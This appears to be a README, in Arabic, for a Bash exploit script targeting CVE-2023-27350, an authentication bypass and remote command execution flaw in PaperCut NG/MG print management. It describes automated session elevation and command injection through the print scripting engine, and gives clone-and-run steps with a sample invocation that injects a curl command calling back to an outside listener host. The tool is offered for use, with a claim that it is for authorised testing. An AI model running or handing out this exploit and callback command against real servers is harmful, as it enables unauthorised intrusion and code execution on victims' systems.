
أداة استغلال تجاوز المصادقة وتنفيذ الأوامر عن بُعد (RCE) لـ PaperCut NG/MG. تنفيذ مستقل بلغة Bash لسلسلة استغلال PaperCut، مع دعم اختياري للبروكسي، ورفع مستوى الجلسة تلقائيًا، وحقن أوامر ديناميكي عبر محرك برمجة الطباعة. مصممة لتدقيق الأمان واختبار الاختراق المرخص.

استغلال Bash مُبسط لثغرة CVE-2023-27350. يقوم هذا السكربت بأتمتة تجاوز المصادقة، وإعداد البيئة، وحقن الأوامر عبر محرك برمجة الطابعات PaperCut.


# استنساخ المستودع
git clone https://github.com/dezso-dfield/CVE-2023-27350.git
# الدخول إلى المجلد
cd CVE-2023-27350
# جعل السكربت قابل للتنفيذ
chmod +x rce.sh
# تشغيل الاستغلال (مثال مع وكيل)
./rce.sh -u http://10.129.238.16:9191 -x http://10.129.238.16:3128 -c "curl http://10.10.15.82:8000/rce"
-u : عنوان الهدف (مثال: http://10.129.x.x:9191)-c : الأمر المراد تنفيذه (بداخل اقتباسات)-x : (اختياري) عنوان الوكيل (مثال: http://10.129.x.x:3128)